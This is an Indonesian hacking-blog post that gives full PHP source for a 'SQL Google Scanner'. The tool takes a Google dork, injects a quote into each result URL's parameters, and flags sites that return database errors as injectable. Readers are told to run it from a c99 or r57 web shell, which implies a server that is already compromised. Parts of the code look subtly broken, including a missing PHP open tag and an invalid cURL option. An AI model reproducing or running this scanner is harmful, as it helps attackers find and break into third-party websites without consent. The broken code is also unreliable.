SQL Google Scanner

Baiklah berikutnya kita akan mempelajari sql google scanner !

Pencarian sql ( "Structured Query Language" ) dengan cara mudah

1. kalian harus ada shell.php setidaknya (c99 dan r57)

2. upload hasil codingan ini ke shell kalian

3. beri extensi ini php = contoh.php

4. jalankan tools ini dan silahkan tunggu

[Gambar: kagami.jpg]

[ Information ]
[+] version : 5.1.42 & 4.1.44

[+] Vulnerability : SQL injection



Kode:::.....!


<html>
    <head>
    <title>SQL Google Scanner</title>
    <style>
    body{
    background: #0F0F0F;
    color: #FFFFFF;
    font-family: monospace;
    font-size: 12px;
    }

    input{
    background: #0F0F0F;
    border: 1px solid #00FF00;
    color: #00FF00;
    }

    h2{
    color: #55FF2A;
    }

    a{ color: #5A5A5A; text-decoration: none; }
    a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
    a:hover{ color: #00FF00; text-decoration: line-through; }
    .effectok:hover { text-decoration: underline; }
    .effectfalse:hover { text-decoration: line-through; }

    </style>

    </head>
    <body>

    php
    echo "<h2>SQL Google Scanner By Kagami hiruzeN www.palembanghackerlink.org";
    echo "<form action='' method='post'>";
    echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
    echo "<input type='submit' value='  Start  '>";
    echo "<hr><br />";

    if($_POST['dork']) {

    @set_time_limit(0);
    @error_reporting(0);
    @ignore_user_abort(true);
    ini_set('memory_limit', '128M');

    $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

    $i = 0;
    $a = 0;
    $b = 0;

    while($b <= 900) {
    $a = 0;
    flush(); ob_flush();
    echo "Pages: [ $b ]<br />";
    echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo "Scanning Google.<br />";
    flush(); ob_flush();

    if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
    echo "Bisey bulunamad
    ";
    flush(); ob_flush();
    break;
    }

    preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
    echo "Loading.<br />";
    flush(); ob_flush();
    while(1) {

    if(preg_match("/You have an error in your SQL|Division by Toni defcon|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
    echo "".str_replace("=", "='", $sites[2][$a])."> <== SQL Injection Success !
    ";
    } else {
    echo "".str_replace("=", "='", $sites[2][$a])."> <== Not access
    ";
    flush(); ob_flush();
    }
    if($a > count($sites[2])-2) {
    echo "Bitti<br />";
    break;
    }
    $a = $a+1;
    }
    $b = $b+100;
    }
    }

    function Connect_Host($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_FOLLOW, 0);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $data = curl_exec($ch);
    if($data) {
    return $data;
    } else {
    return 0;
    }
    }

    function Clean($text) {
    return htmlspecialchars($text, ENT_QUOTES);
    }

    ?>

    </body>
    </html>



selamat mencoba.

Penulis : planet-kernel ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel SQL Google Scanner ini dipublish oleh planet-kernel pada hari . Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan SQL Google Scanner
 

0 komentar:

Posting Komentar